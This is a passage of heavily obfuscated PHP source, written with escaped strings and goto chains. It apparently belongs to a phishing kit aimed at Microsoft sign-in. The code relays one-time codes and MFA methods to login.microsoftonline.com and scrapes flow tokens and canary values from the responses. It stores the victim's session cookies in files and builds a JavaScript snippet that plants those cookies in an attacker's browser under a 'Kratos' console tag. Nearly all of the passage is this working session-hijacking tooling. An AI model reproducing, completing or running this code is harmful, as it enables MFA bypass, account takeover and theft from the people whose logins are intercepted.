                        ]["\x73\x65\x73\163\151\157\156\137\151\144"],
                    "\106\x6c\157\x77\x54\157\x6b\x65\x6e" =>
                        $_SESSION[
                            "\151\x6e\x66\157\x5f\164\x6f\x6b\x65\156\x5f\62\x66\141"
                        ]["\163\106\x54"],
                    "\103\x74\170" =>
                        $_SESSION[
                            "\x69\x6e\x66\x6f\137\164\157\x6b\x65\x6e\137\x32\x66\141"
                        ]["\163\x43\164\x78"],
                    "\x41\165\x74\150\115\145\x74\x68\x6f\x64\111\x64" => $cfe83,
                    "\101\144\x64\x69\164\151\157\x6e\141\x6c\101\x75\x74\x68\104\141\x74\x61" => $d8403,
                    "\x50\x6f\x6c\154\x43\x6f\x75\156\x74" => 1,
                ],
            ]
        );
        goto Ef2f5;
        Bf8f6:
        $this->ProcessAuthSmsAndCode($d8403, $cfe83);
        goto B9bca;
        Cd94f:
        bbc45:
        goto D78ff;
        e18ef:
    }
    public function ProcessAuthSmsAndCode($d8403, $cfe83)
    {
        goto A9d11;
        e2f14:
        preg_match(
            "\57\x28\x3f\x3c\x3d\x22\163\x46\x54\x22\72\42\x29\133\x5e\x22\135\52\x2f",
            $A75e0,
            $ea051
        );
        goto Ca9e1;
        e7d2c:
        preg_match(
            "\57\x28\x3f\x3c\75\42\x73\106\124\42\x3a\x22\51\133\x5e\x22\x5d\52\x2f",
            $A75e0,
            $ea051
        );
        goto F3d86;
        Eb4c1:
        $A75e0 = $Accd6->getBody()->getContents();
        goto ca801;
        ef5c8:
        $Bc3b4 = $Bc3b4[0];
        goto a38ae;
        De3ec:
        $this->B5b07 = $ef175;
        goto Bc622;
        B4c9d:
        $this->B5b07 = $ef175;
        goto aa20f;
        c880d:
        $Accd6 = $Bcc9d->request(
            "\120\x4f\123\124",
            "\150\164\164\160\x73\72\x2f\57\154\157\x67\x69\x6e\x2e\x6d\x69\x63\162\x6f\x73\157\146\x74\x6f\156\x6c\x69\156\x65\56\x63\157\155\57\x6b\155\x73\x69",
            [
                "\150\x65\141\144\145\162\x73" => [
                    "\101\143\x63\x65\x70\x74" =>
                        "\164\145\170\x74\x2f\150\164\155\x6c\54\x61\x70\160\x6c\151\143\x61\x74\x69\x6f\x6e\x2f\x78\150\164\155\x6c\x2b\x78\x6d\x6c\54\141\x70\x70\x6c\x69\143\x61\164\x69\157\156\x2f\170\155\154\x3b\x71\75\x30\x2e\x39\x2c\x69\x6d\141\147\x65\x2f\x61\166\151\x66\54\x69\155\x61\147\x65\57\x77\145\142\160\x2c\151\155\x61\x67\x65\x2f\x61\x70\156\x67\54\x2a\x2f\x2a\x3b\161\75\60\x2e\70\x2c\141\x70\x70\154\x69\143\141\164\151\157\156\x2f\163\151\147\156\x65\144\55\145\170\x63\x68\141\x6e\147\145\73\166\x3d\x62\x33\73\x71\75\x30\x2e\x37",
                    "\101\143\143\x65\160\164\55\114\141\x6e\147\x75\141\147\x65" =>
                        "\145\156\x2d\x55\x53\54\145\x6e\x3b\161\x3d\60\x2e\71",
                    "\103\141\143\150\145\x2d\x43\x6f\x6e\164\162\157\154" =>
                        "\155\x61\170\x2d\x61\x67\145\75\60",
                    "\x43\157\156\x74\x65\156\x74\55\124\171\160\145" =>
                        "\x61\160\160\x6c\x69\x63\x61\164\151\x6f\156\57\x78\x2d\167\x77\x77\x2d\x66\x6f\x72\155\x2d\165\x72\x6c\x65\156\x63\157\144\145\x64",
                    "\x43\157\x6f\153\x69\x65" => $this->gencook(
                        $this->A20d7 .
                            "\57\x63\x6f\x6f\153\151\145\x5f" .
                            $this->Fa736 .
                            "\x2e\164\x78\x74"
                    ),
                    "\x4f\162\151\x67\151\x6e" =>
                        "\x68\164\164\160\x73\x3a\x2f\57\x6c\x6f\147\x69\x6e\56\x6d\x69\x63\x72\x6f\x73\157\146\164\x6f\x6e\x6c\x69\156\x65\x2e\143\157\x6d",
                    "\x52\x65\x66\145\162\145\162" =>
                        "\150\x74\164\x70\163\x3a\x2f\x2f\x6c\x6f\147\x69\x6e\56\155\x69\x63\x72\x6f\163\157\146\164\157\x6e\x6c\151\156\145\56\143\157\x6d\57\143\x6f\x6d\x6d\157\x6e\57\154\157\x67\x69\156",
                    "\x53\x65\x63\x2d\x43\110\55\x55\x41" =>
                        "\42\x4d\x69\x63\x72\157\x73\157\x66\x74\40\x45\144\147\145\x22\x3b\x76\75\x22\61\x32\x39\42\54\40\x22\x4e\157\164\x3d\x41\x3f\x42\x72\x61\x6e\x64\x22\73\166\75\x22\70\x22\x2c\40\42\x43\x68\162\157\155\x69\x75\x6d\x22\73\166\x3d\42\61\62\71\42",
                    "\123\x65\x63\55\x43\x48\55\x55\101\x2d\115\157\x62\151\154\145" =>
                        "\x3f\60",
                    "\x53\145\x63\55\x43\x48\x2d\125\x41\55\120\x6c\x61\x74\x66\x6f\x72\x6d" =>
                        "\42\x57\x69\156\x64\157\x77\163\x22",
                    "\123\x65\143\55\106\x65\x74\143\150\x2d\104\x65\x73\164" =>
                        "\144\x6f\x63\x75\x6d\x65\x6e\x74",
                    "\123\x65\143\x2d\x46\x65\164\143\x68\x2d\x4d\x6f\144\x65" =>
                        "\x6e\x61\166\151\147\x61\x74\x65",
                    "\123\x65\x63\55\106\x65\x74\x63\x68\55\x53\151\x74\145" =>
                        "\163\x61\155\145\x2d\x6f\x72\x69\x67\x69\156",
                    "\123\145\143\55\x46\145\x74\x63\x68\x2d\x55\163\x65\162" =>
                        "\x3f\61",
                    "\125\x70\147\x72\141\x64\x65\x2d\x49\156\163\145\x63\x75\x72\x65\55\122\145\x71\165\145\163\x74\163" =>
                        "\61",
                    "\125\x73\145\162\x2d\x41\x67\x65\x6e\x74" =>
                        "\115\157\172\x69\x6c\x6c\141\57\x35\56\60\x20\50\x57\151\156\144\157\167\163\x20\x4e\x54\40\61\x30\x2e\60\73\40\127\x69\x6e\x36\x34\73\x20\170\66\x34\51\x20\x41\x70\x70\154\145\x57\145\x62\113\x69\164\x2f\x35\x33\x37\x2e\x33\66\x20\50\113\110\124\x4d\x4c\54\x20\x6c\x69\153\x65\x20\x47\x65\x63\x6b\157\x29\x20\x43\x68\x72\157\x6d\x65\x2f\61\x32\71\x2e\60\56\x30\56\x30\40\x53\141\x66\141\x72\151\x2f\x35\x33\67\x2e\63\x36\x20\x45\x64\x67\57\61\x32\71\x2e\60\56\x30\x2e\x30",
                ],
                "\x66\x6f\162\155\137\x70\141\x72\141\155\163" => [
                    "\x4c\x6f\147\151\x6e\x4f\160\x74\x69\157\156\163" => "\61",
                    "\164\x79\x70\145" => "\x32\70",
                    "\x63\x74\170" => $this->cc473,
                    "\150\160\x67\162\145\161\165\145\163\164\151\144" =>
                        $this->ad1e3,
                    "\x66\x6c\x6f\x77\124\x6f\x6b\x65\156" => $this->fac50,
                    "\104\157\x6e\x74\x53\x68\x6f\x77\x41\147\141\x69\x6e" =>
                        "\164\x72\165\x65",
                    "\143\x61\156\x61\x72\x79" => $this->B5b07,
                    "\151\x31\x39" => "\x31\64\x31\60\x38",
                ],
            ]
        );
        goto F2ffe;
        Ca303:
        preg_match(
            "\57\50\77\x3c\x3d\42\x63\x61\x6e\141\x72\171\x22\72\x22\x29\133\136\42\x5d\52\x2f",
            $A75e0,
            $ef175
        );
        goto C0481;
        d5d29:
        $this->fac50 = $ea051;
        goto B86f4;
        ccc9b:
        preg_match(
            "\57\50\77\x3c\x3d\42\x73\145\x73\163\x69\x6f\x6e\111\144\x22\x3a\x22\51\133\136\42\135\52\57",
            $A75e0,
            $E2cb4
        );
        goto ee811;
        ca801:
        preg_match(
            "\57\x28\77\74\x3d\x22\163\x43\164\170\42\72\42\51\x5b\136\42\x5d\x2a\57",
            $A75e0,
            $Bc3b4
        );
        goto ef5c8;
        c537c:
        $A75e0 = $Accd6->getBody()->getContents();
        goto e6376;
        A9d11:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\57\x63\157\x6f\153\x69\x65\x5f" .
                $this->Fa736 .
                "\x2e\x74\x78\164",
            true
        );
        goto Ebce6;
        Ceb1a:
        $F16be->save(
            $this->A20d7 .
                "\x2f\x63\157\157\x6b\151\x65\137" .
                $this->Fa736 .
                "\x2e\164\x78\164"
        );
        goto Eb4c1;
        F4820:
        $ea051 = $ea051[0];
        goto E29c4;
        ee9dd:
        $D5295 = file_get_contents(
            $this->A20d7 .
                "\x2f\x63\x6f\x6f\x6b\151\x65\x5f" .
                $this->Fa736 .
                "\56\164\170\x74"
        );
        goto e9b65;
        Ce168:
        preg_match(
            "\x2f\x28\77\74\75\x22\x73\x43\164\170\x22\x3a\x22\51\133\x5e\42\135\x2a\x2f",
            $A75e0,
            $Bc3b4
        );
        goto Aba68;
        d26ad:
        $Accd6 = $Bcc9d->post(
            "\150\x74\164\x70\x73\x3a\57\x2f\154\157\147\151\x6e\56\155\x69\143\x72\x6f\163\x6f\146\164\157\156\x6c\151\156\x65\x2e\143\157\x6d\x2f\x63\x6f\155\155\157\156\57\162\145\x73\x75\x6d\x65",
            [
                "\161\165\145\162\171" => [
                    "\x73\153\x69\160\x6d\x66\141\162\145\x67\x69\163\164\162\141\x74\151\x6f\156" =>
                        "\61",
                ],
                "\x68\x65\x61\x64\x65\162\163" => [
                    "\125\163\145\162\x2d\101\147\x65\x6e\x74" =>
                        "\115\157\x7a\151\x6c\x6c\141\x2f\65\x2e\60\x20\50\x4d\x61\143\151\x6e\x74\x6f\x73\150\73\40\111\x6e\x74\145\x6c\40\x4d\x61\143\x20\117\x53\40\x58\x20\x31\x30\56\x31\65\x3b\40\x72\166\x3a\x31\x32\62\56\x30\x29\40\x47\x65\x63\153\157\x2f\x32\60\61\60\x30\x31\60\61\x20\106\151\x72\145\x66\x6f\170\x2f\61\x32\x32\56\x30",
                    "\x41\x63\143\x65\x70\x74" =>
                        "\164\x65\x78\164\57\x68\164\x6d\154\54\x61\160\160\154\x69\143\x61\164\x69\157\156\57\x78\150\164\155\x6c\x2b\170\155\x6c\54\141\x70\160\x6c\151\143\x61\164\151\157\156\x2f\170\x6d\154\x3b\x71\x3d\60\56\x39\x2c\x69\155\141\x67\145\x2f\141\166\151\x66\54\151\x6d\x61\x67\x65\57\x77\145\x62\160\x2c\x2a\57\x2a\73\x71\75\60\56\x38",
                    "\101\143\x63\145\x70\164\x2d\114\141\x6e\x67\x75\x61\x67\145" =>
                        "\145\x6e\55\x55\123\x2c\x65\156\x3b\x71\75\60\x2e\65",
                    "\101\143\x63\145\160\x74\x2d\x45\x6e\x63\157\144\151\156\x67" =>
                        "\x67\x7a\151\x70\54\x20\x64\145\x66\154\x61\x74\x65\54\40\x62\x72",
                    "\122\x65\146\145\162\145\162" =>
                        "\x68\164\164\160\163\72\57\57\x6c\157\147\151\x6e\56\155\151\143\162\157\x73\x6f\146\x74\x6f\156\154\151\156\x65\56\143\157\x6d\57\143\x6f\155\x6d\x6f\156\57\123\101\x53\57\120\x72\x6f\143\x65\x73\163\101\x75\164\150",
                    "\103\157\x6e\x74\145\156\x74\x2d\124\x79\160\145" =>
                        "\x61\160\x70\154\x69\143\x61\x74\x69\157\156\57\x78\x2d\x77\167\x77\55\x66\157\162\x6d\x2d\x75\x72\154\x65\x6e\143\157\x64\145\144",
                    "\117\162\x69\x67\x69\x6e" =>
                        "\x68\x74\x74\160\x73\72\57\x2f\154\x6f\x67\x69\x6e\x2e\x6d\x69\x63\x72\x6f\x73\157\x66\x74\x6f\x6e\154\151\x6e\145\x2e\x63\157\155",
                    "\x43\x6f\x6e\x6e\x65\x63\x74\151\157\156" =>
                        "\x6b\145\145\x70\55\x61\x6c\151\166\145",
                    "\103\x6f\x6f\x6b\151\x65" => $this->gencook(
                        $this->A20d7 .
                            "\57\x63\157\157\x6b\x69\145\137" .
                            $this->Fa736 .
                            "\56\164\170\164"
                    ),
                    "\x55\160\x67\162\141\144\x65\55\111\156\x73\145\143\165\162\x65\x2d\x52\145\x71\165\x65\x73\164\163" =>
                        "\x31",
                    "\123\x65\143\x2d\106\145\164\x63\x68\x2d\x44\145\163\x74" =>
                        "\144\157\143\165\x6d\145\x6e\x74",
                    "\123\x65\x63\55\106\145\164\x63\150\55\x4d\x6f\144\145" =>
                        "\x6e\x61\x76\151\x67\x61\164\145",
                    "\123\145\143\55\x46\145\x74\x63\150\55\x53\151\164\145" =>
                        "\x73\x61\x6d\145\55\157\162\151\x67\x69\x6e",
                    "\x53\145\143\x2d\106\145\164\x63\x68\55\x55\x73\145\162" =>
                        "\77\61",
                    "\124\x45" => "\164\162\x61\x69\154\x65\x72\163",
                ],
                "\x66\x6f\162\x6d\137\160\141\x72\141\x6d\163" => [
                    "\146\154\x6f\x77\x54\157\153\145\x6e" => $this->{$ea051},
                    "\143\164\170" => $e6a8e,
                    "\x63\x61\156\141\x72\x79" => $this->{$ef175},
                ],
            ]
        );
        goto Ceb1a;
        E29c4:
        $this->fac50 = $ea051;
        goto faceb;
        Ca9e1:
        $ea051 = $ea051[0];
        goto d5d29;
        E1044:
        $this->cc473 = $Bc3b4;
        goto ccc9b;
        C0481:
        $ef175 = $ef175[0];
        goto Ac6ba;
        e9b65:
        $E3848 =
            "\x28\146\x75\x6e\x63\164\x69\x6f\x6e\50\51\40\x7b\xd\xa\11\x9\x9\11\11\154\145\164\x20\143\157\x6f\x6b\x69\145\x73\x20\75\40\112\123\117\116\x2e\x70\141\x72\163\145\x28\x60" .
            $D5295 .
            "\x60\51\73\15\12\x9\11\x9\x9\xd\12\11\x9\x9\x9\11\x66\165\156\143\164\151\157\x6e\x20\x70\165\164\x43\157\157\153\x69\x65\x28\153\x65\171\54\40\x76\141\154\x75\145\54\40\x64\x6f\x6d\141\151\156\x2c\40\x70\141\164\x68\x2c\x20\x69\163\x53\x65\x63\x75\x72\x65\x29\40\x7b\xd\xa\x9\x9\11\11\11\x9\x63\157\x6e\163\x74\40\x63\157\157\153\151\x65\x4d\x61\x78\101\x67\x65\x20\75\40\42\x4d\141\x78\x2d\x41\x67\x65\75\x33\61\65\x33\66\x30\60\x30\x22\x3b\xd\12\x9\x9\x9\11\11\11\151\x66\x20\x28\153\145\171\56\163\164\141\162\164\163\127\151\x74\150\x28\x22\137\137\x48\x6f\x73\x74\x22\x29\51\40\173\xd\12\x9\11\11\x9\x9\x9\x9\143\x6f\156\163\x6f\x6c\x65\56\154\157\147\50\42\75\x3d\75\x3d\x20\113\162\141\164\x6f\163\x20\x3d\75\x3d\x3d\76\42\x2c\40\x6b\145\x79\54\40\x76\x61\x6c\165\145\x29\73\xd\12\x9\x9\11\x9\11\11\x9\144\x6f\x63\x75\x6d\145\156\x74\x2e\143\x6f\157\x6b\x69\145\x20\x3d\x20\140\x24\x7b\153\x65\171\175\x3d\44\x7b\166\141\154\165\x65\x7d\73\44\x7b\x63\157\157\x6b\151\145\x4d\141\170\x41\x67\x65\175\x3b\160\141\x74\150\75\57\73\123\x65\143\x75\162\145\x3b\x53\141\x6d\145\123\x69\164\145\x3d\x4e\x6f\156\x65\x60\x3b\xd\12\x9\x9\11\11\x9\11\175\40\145\x6c\x73\x65\x20\x69\146\40\50\153\x65\171\56\163\164\x61\162\164\163\x57\151\164\150\50\x22\x5f\x5f\x53\x65\143\x75\162\145\42\x29\51\x20\173\xd\xa\x9\11\x9\11\x9\11\11\143\x6f\156\x73\157\x6c\145\56\154\x6f\147\x28\x22\x3d\x3d\x3d\x3d\40\x4b\x72\141\164\x6f\163\x20\75\x3d\75\x3d\x3e\x22\x2c\x20\x6b\145\x79\x2c\x20\166\x61\154\x75\x65\51\73\15\xa\x9\11\11\x9\11\11\11\144\157\x63\165\155\145\x6e\x74\56\143\x6f\x6f\153\151\145\40\75\x20\140\44\x7b\153\145\x79\175\75\x24\x7b\166\141\154\x75\145\175\73\x24\173\143\157\157\153\151\145\x4d\141\170\x41\x67\145\x7d\x3b\x64\x6f\155\x61\151\156\75\x24\173\144\x6f\x6d\x61\151\156\x7d\x3b\160\x61\x74\150\x3d\x24\x7b\160\x61\x74\x68\175\x3b\123\145\x63\165\x72\145\73\x53\x61\155\145\x53\x69\x74\x65\x3d\x4e\157\x6e\145\140\x3b\xd\xa\x9\x9\11\x9\x9\x9\x7d\x20\x65\x6c\163\145\x20\173\xd\xa\11\11\11\x9\x9\x9\11\151\146\40\50\x69\163\123\x65\143\x75\162\x65\51\x20\x7b\15\xa\11\x9\x9\11\11\x9\11\11\143\x6f\156\163\x6f\x6c\145\56\x6c\x6f\x67\50\x22\75\75\x3d\75\40\x4b\x72\141\x74\x6f\163\x20\x3d\x3d\x3d\75\76\x22\54\x20\x6b\x65\171\x2c\40\x76\141\x6c\165\145\x29\x3b\15\12\x9\11\11\11\11\x9\x9\x9\151\x66\40\x28\167\151\x6e\x64\157\167\56\x6c\157\143\x61\x74\x69\157\x6e\x2e\x68\x6f\163\x74\156\x61\x6d\x65\40\75\x3d\x20\144\157\155\x61\x69\156\51\40\173\xd\xa\11\x9\11\11\11\x9\x9\11\11\x64\x6f\x63\165\155\145\x6e\x74\56\143\x6f\157\153\151\145\x20\75\x20\x60\x24\x7b\x6b\145\171\x7d\x3d\x24\173\x76\141\x6c\165\145\175\73\x24\x7b\143\157\x6f\153\x69\145\115\141\170\101\x67\145\175\73\40\x70\141\164\150\75\x24\173\x70\x61\x74\150\x7d\x3b\x20\123\145\143\x75\162\x65\x3b\40\x53\141\x6d\145\123\151\164\145\75\x4e\x6f\156\x65\x60\x3b\15\12\11\11\11\x9\11\11\x9\11\x7d\x20\145\x6c\163\145\40\x7b\xd\xa\x9\x9\11\x9\x9\11\x9\x9\11\x64\x6f\143\165\x6d\x65\x6e\164\x2e\x63\157\x6f\x6b\151\x65\40\x3d\x20\140\44\x7b\153\145\171\x7d\75\44\173\x76\x61\x6c\x75\x65\x7d\73\44\173\143\157\x6f\x6b\x69\145\115\x61\x78\101\x67\x65\x7d\73\x64\157\x6d\141\151\x6e\x3d\x24\173\144\157\155\x61\151\x6e\175\x3b\160\x61\x74\x68\x3d\44\173\x70\141\x74\150\175\x3b\x53\x65\x63\165\x72\x65\x3b\123\x61\155\145\123\x69\164\x65\75\116\x6f\156\145\140\73\15\xa\11\11\11\x9\11\11\x9\x9\x7d\15\12\11\x9\11\11\x9\11\x9\x7d\40\145\x6c\163\x65\40\x7b\15\12\11\11\x9\11\x9\x9\x9\x9\x63\157\x6e\x73\x6f\154\x65\x2e\x6c\157\x67\x28\x22\x3d\75\75\x3d\40\x4b\x72\x61\x74\x6f\163\x20\x3d\x3d\75\75\x3e\x22\x2c\x20\x6b\145\171\x2c\x20\x76\x61\154\165\x65\x29\x3b\xd\xa\11\x9\x9\x9\x9\x9\11\11\151\x66\40\50\167\151\156\x64\157\x77\56\154\157\x63\141\164\151\x6f\156\x2e\150\157\163\164\x6e\x61\x6d\x65\x20\x3d\75\40\144\157\155\141\151\156\51\x20\173\15\12\x9\x9\x9\11\11\x9\x9\x9\x9\144\157\143\165\x6d\x65\156\x74\x2e\x63\x6f\157\153\151\145\40\75\x20\x60\44\173\153\145\x79\x7d\x3d\x24\x7b\x76\141\x6c\x75\x65\175\x3b\x24\x7b\143\157\157\153\151\145\x4d\x61\x78\101\147\x65\175\x3b\160\x61\x74\150\x3d\x24\x7b\160\141\x74\x68\x7d\x3b\140\73\xd\12\x9\11\x9\11\x9\11\x9\11\x7d\x20\145\x6c\x73\x65\40\x7b\15\xa\x9\x9\11\x9\x9\x9\x9\11\x9\144\157\143\165\155\145\156\164\56\143\157\x6f\x6b\151\x65\x20\x3d\x20\140\44\x7b\153\x65\x79\x7d\x3d\x24\x7b\x76\x61\154\165\145\x7d\73\44\x7b\143\157\x6f\153\x69\x65\x4d\141\170\101\x67\x65\175\73\x64\157\155\x61\x69\x6e\75\x24\173\144\x6f\x6d\x61\151\156\x7d\73\x70\x61\164\x68\x3d\44\x7b\160\x61\x74\x68\175\x3b\x60\x3b\15\xa\x9\11\x9\11\x9\x9\x9\11\x7d\xd\xa\x9\11\11\11\x9\11\x9\175\15\xa\11\x9\11\11\x9\x9\x7d\xd\xa\11\x9\11\11\11\175\xd\12\11\x9\x9\11\x9\x66\157\x72\40\x28\154\x65\164\x20\143\x6f\x6f\153\151\145\40\157\x66\x20\x63\x6f\x6f\153\x69\145\x73\x29\x20\x7b\15\12\x9\11\11\11\x9\11\x70\x75\164\x43\x6f\x6f\x6b\151\x65\50\143\157\x6f\153\151\145\x2e\x4e\141\155\x65\54\x20\143\x6f\157\153\x69\x65\56\x56\141\154\165\145\x2c\x20\143\157\x6f\x6b\x69\145\x2e\104\157\x6d\x61\151\x6e\x2c\40\x63\157\x6f\x6b\151\x65\x2e\120\x61\x74\x68\54\40\143\x6f\157\153\151\145\56\123\x65\x63\165\x72\x65\51\73\xd\12\x9\11\x9\11\x9\x7d\15\12\x9\11\x9\x9\x7d\x28\x29\x29\73";
        goto C1702;
        e3231:
        $Accd6 = $Bcc9d->post(
            "\150\x74\164\160\x73\x3a\57\57\154\157\147\151\156\x2e\x6d\x69\x63\x72\x6f\x73\157\146\x74\157\156\x6c\151\156\145\x2e\143\157\x6d\57\143\157\155\x6d\157\156\57\123\101\x53\57\x50\162\157\143\145\163\163\101\165\164\x68",
            [
                "\x68\x65\141\x64\145\162\x73" => [
                    "\x55\x73\x65\x72\x2d\x41\147\x65\156\164" =>
                        "\x4d\157\x7a\151\154\154\141\57\x35\56\60\x20\50\115\141\143\151\x6e\x74\x6f\163\150\x3b\x20\x49\x6e\164\145\154\x20\x4d\x61\x63\x20\117\123\40\130\x20\61\60\x2e\61\x35\73\40\x72\x76\72\61\60\71\56\60\x29\40\x47\x65\143\153\x6f\x2f\62\60\61\x30\x30\x31\x30\61\40\106\x69\162\145\x66\157\170\57\x31\x31\x35\x2e\60",
                    "\x41\x63\143\x65\x70\x74" =>
                        "\x74\145\170\164\57\x68\164\155\154\x2c\141\x70\160\x6c\151\143\141\164\x69\157\156\57\x78\x68\x74\155\x6c\x2b\170\x6d\x6c\54\x61\160\x70\x6c\x69\x63\141\164\x69\x6f\156\57\x78\155\154\73\161\x3d\x30\x2e\x39\x2c\151\x6d\x61\147\x65\57\141\166\151\146\54\151\155\x61\x67\145\57\167\x65\x62\160\54\x2a\57\52\x3b\x71\x3d\60\56\70",
                    "\x41\143\x63\145\x70\164\x2d\x4c\141\x6e\147\x75\141\x67\x65" =>
                        "\145\x6e\x2d\x55\123\54\145\156\x3b\x71\75\x30\56\65",
                    "\101\x63\143\x65\x70\164\55\105\156\143\x6f\x64\151\156\x67" =>
                        "\x67\172\151\x70\x2c\40\x64\x65\146\x6c\141\x74\x65\54\x20\x62\162",
                    "\x52\x65\x66\x65\x72\x65\162" =>
                        "\x68\164\x74\x70\163\72\57\57\x6c\157\147\x69\x6e\x2e\x6d\151\x63\162\x6f\163\157\146\x74\x6f\156\154\151\156\x65\56\143\157\x6d\x2f\x63\x6f\x6d\x6d\x6f\156\x2f\x6c\157\147\151\156",
                    "\103\x6f\x6e\164\x65\x6e\164\55\x54\x79\160\145" =>
                        "\141\160\x70\154\151\x63\141\x74\151\157\x6e\x2f\x78\x2d\167\167\167\55\146\x6f\x72\155\55\165\x72\154\x65\x6e\x63\x6f\144\x65\144",
                    "\117\162\151\x67\x69\156" =>
                        "\x68\164\x74\x70\x73\x3a\x2f\x2f\x6c\157\x67\x69\156\x2e\x6d\x69\x63\162\x6f\163\x6f\146\164\157\x6e\x6c\x69\x6e\145\x2e\143\157\155",
                    "\x43\157\x6e\x6e\145\143\164\151\x6f\x6e" =>
                        "\153\x65\145\x70\x2d\x61\154\151\x76\x65",
                    "\x43\157\157\153\151\145" => $this->gencook(
                        $this->A20d7 .
                            "\57\x63\x6f\157\153\151\x65\137" .
                            $this->Fa736 .
                            "\x2e\164\170\164"
                    ),
                    "\x55\160\x67\x72\141\144\145\55\x49\x6e\163\145\x63\x75\162\145\55\x52\145\x71\165\145\163\164\163" =>
                        "\61",
                    "\123\x65\143\x2d\x46\145\x74\x63\150\x2d\x44\x65\163\164" =>
                        "\x64\157\x63\165\155\145\x6e\164",
                    "\123\145\143\x2d\106\x65\164\x63\150\x2d\x4d\157\x64\145" =>
                        "\x6e\141\x76\x69\x67\x61\164\x65",
                    "\x53\x65\x63\x2d\x46\x65\x74\143\x68\55\123\151\164\145" =>
                        "\163\x61\155\x65\55\157\x72\151\x67\x69\x6e",
                ],
                "\x66\x6f\162\155\x5f\x70\x61\162\x61\x6d\x73" => [
                    "\164\171\160\x65" => "\62\62",
                    "\107\x65\x6e\145\x72\x61\154\x56\145\162\x69\146\x79" =>
                        "\146\x61\154\x73\x65",
                    "\162\x65\x71\165\145\x73\x74" => $this->cc473,
                    "\x6d\146\141\114\x61\x73\164\x50\x6f\154\154\x53\164\141\x72\164" =>
                        "\61\x36\x38\71\70\64\60\61\x34\62\64\x38\x31",
                    "\x6d\x66\x61\114\x61\x73\164\120\157\154\154\105\156\144" =>
                        "\61\x36\x38\x39\70\64\x30\61\x34\63\66\60\x32",
                    "\x6d\146\x61\101\x75\x74\x68\x4d\x65\x74\150\x6f\x64" => $cfe83,
                    "\157\x74\143" => $d8403,
                    "\x6c\157\x67\x69\156" => $this->Fa736,
                    "\146\x6c\x6f\167\x54\x6f\153\x65\x6e" => $this->fac50,
                    "\x68\x70\147\162\145\x71\x75\x65\x73\x74\151\144" =>
                        $this->E423c,
                    "\163\141\x63\x78\164" => "",
                    "\150\x69\x64\x65\x53\155\163\111\156\x4d\x66\141\x50\x72\157\157\146\x73" =>
                        "\x66\x61\154\x73\145",
                    "\x63\x61\156\x61\162\x79" => $this->B5b07,
                    "\151\x31\x39" => "\x32\70\x31\x33\x32",
                ],
            ]
        );
        goto Dcbf5;
        f82eb:
        preg_match(
            "\57\x28\x3f\74\x3d\42\x73\x46\x54\x22\x3a\42\51\x5b\x5e\x22\x5d\x2a\57",
            $A75e0,
            $ea051
        );
        goto F4820;
        F718f:
        preg_match(
            "\57\x28\x3f\x3c\75\42\x73\x50\162\157\157\x66\x55\x70\101\x75\x74\x68\x53\164\141\x74\145\42\x3a\x22\51\133\x5e\x22\135\x2a\x2f",
            $A75e0,
            $e6a8e
        );
        goto d308f;
        a38ae:
        $this->cc473 = $Bc3b4;
        goto D04d4;
        Ebce6:
        $Bcc9d = new Client(["\143\x6f\x6f\x6b\x69\x65\x73" => $F16be]);
        goto e3231;
        Bc622:
        goto e54db;
        goto f1f6e;
        Aba68:
        $Bc3b4 = $Bc3b4[0];
        goto E1044;
        faceb:
        preg_match(
            "\x2f\x28\77\x3c\x3d\x22\x63\x61\x6e\141\162\171\x22\x3a\42\x29\x5b\136\x22\x5d\52\x2f",
            $A75e0,
            $ef175
        );
        goto F20b0;
        e6376:
        if (
            strpos(
                $A75e0,
                "\103\x6f\x6e\x76\x65\162\147\x65\144\x50\162\157\157\146\125\160\x52\x65\144\x69\162\145\143\164"
            ) !== false
        ) {
            goto Cc712;
        }
        goto Ce168;
        E3964:
        $E2cb4 = $E2cb4[0];
        goto aab9b;
        D04d4:
        preg_match(
            "\57\50\77\x3c\75\x22\163\x65\x73\x73\151\x6f\x6e\111\144\x22\x3a\x22\51\x5b\x5e\42\135\x2a\x2f",
            $A75e0,
            $E2cb4
        );
        goto E3964;
        d308f:
        $e6a8e = $e6a8e[0];
        goto Ca303;
        Ac6ba:
        $this->fac50 = $ea051;
        goto ea57a;
        aab9b:
        $this->E423c = $E2cb4;
        goto e2f14;
        c5150:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\x2f\143\x6f\157\x6b\151\145\137" .
                $this->Fa736 .
                "\56\164\x78\164",
            true
        );
        goto Af1c6;
        Ef75c:
        $A75e0 = $Accd6->getBody()->getContents();
        goto ee9dd;
        B86f4:
        preg_match(
            "\x2f\50\77\x3c\75\42\x63\x61\156\x61\162\x79\42\x3a\x22\x29\133\x5e\x22\135\x2a\x2f",
            $A75e0,
            $ef175
        );
        goto D9760;
        f1f6e:
        Cc712:
        goto e7d2c;
        D9760:
        $ef175 = $ef175[0];
        goto B4c9d;
        bdcde:
        $this->E423c = $E2cb4;
        goto f82eb;
        F2ffe:
        $F16be->save(
            $this->A20d7 .
                "\57\143\157\x6f\153\x69\145\137" .
                $this->Fa736 .
                "\x2e\164\x78\x74"
        );
        goto Ef75c;
        C1702:
        file_put_contents(
            $this->A20d7 . "\57\152\x73\137" . $this->Fa736 . "\56\164\170\164",
            $E3848
        );
        goto e716a;
        ea57a:
        $this->B5b07 = $ef175;
        goto c5150;
        F20b0:
        $ef175 = $ef175[0];
        goto De3ec;
        ee811:
        $E2cb4 = $E2cb4[0];
        goto bdcde;
        Af1c6:
        $Bcc9d = new Client(["\x63\x6f\x6f\153\151\x65\x73" => $F16be]);
        goto d26ad;
        Dcbf5:
        $F16be->save(
            $this->A20d7 .
                "\57\x63\x6f\157\153\151\145\137" .
                $this->Fa736 .
                "\56\x74\x78\x74"
        );
        goto c537c;
        aa20f:
        e54db:
        goto c880d;
        F3d86:
        $ea051 = $ea051[0];
        goto F718f;
        e716a:
    }
    public function ProcessAuthApp()
    {
        goto d4857;
        B9926:
        $Accd6 = $Bcc9d->post(
            "\150\164\x74\160\163\x3a\57\x2f\x6c\157\147\x69\x6e\56\x6d\x69\143\x72\x6f\x73\x6f\x66\x74\157\x6e\x6c\x69\x6e\145\x2e\143\x6f\x6d\x2f\x63\157\155\x6d\157\x6e\x2f\x53\x41\x53\x2f\x50\x72\157\x63\x65\163\163\x41\x75\164\x68",
            [
                "\x68\145\141\x64\145\x72\163" => [
                    "\125\x73\x65\x72\x2d\x41\x67\x65\156\x74" =>
